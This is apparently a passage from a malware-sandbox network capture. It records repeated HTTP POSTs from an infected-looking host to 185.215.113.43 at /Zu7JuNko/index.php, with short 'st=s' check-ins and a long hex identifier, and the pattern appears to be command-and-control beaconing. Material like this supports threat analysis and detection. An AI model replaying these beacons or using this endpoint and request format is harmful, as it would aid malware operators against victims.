                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:56.447594881 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:15:56 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            121192.168.2.450337185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:58.176717997 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:59.550769091 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:15:59 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            122192.168.2.450338185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:01.184344053 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:02.588038921 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:16:02 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            123192.168.2.450339185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:04.334749937 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:05.675510883 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:16:05 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            124192.168.2.450340185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:07.301425934 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:08.685854912 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            125192.168.2.450341185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:10.431032896 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:11.817234039 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            126192.168.2.450342185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:13.455482006 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:14.836599112 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:16:14 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            127192.168.2.450345185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:16.571624041 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:18.039094925 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:16:17 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            128192.168.2.450346185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:19.672813892 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:21.054152966 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:16:20 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            129192.168.2.450347185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:22.804591894 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:24.229784966 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:16:24 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            130192.168.2.450348185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:25.868757963 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:27.308777094 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:16:27 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            131192.168.2.450349185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:29.046905041 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:30.436872005 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:16:30 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            132192.168.2.450350185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:32.072268963 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:33.453022003 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:16:33 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            133192.168.2.450351185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:35.182885885 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:36.570184946 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:16:36 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            134192.168.2.450352185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:38.201803923 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:39.592641115 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:16:39 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            135192.168.2.450353185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:41.341362000 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:42.773883104 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:16:42 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            136192.168.2.450354185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:44.398447037 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
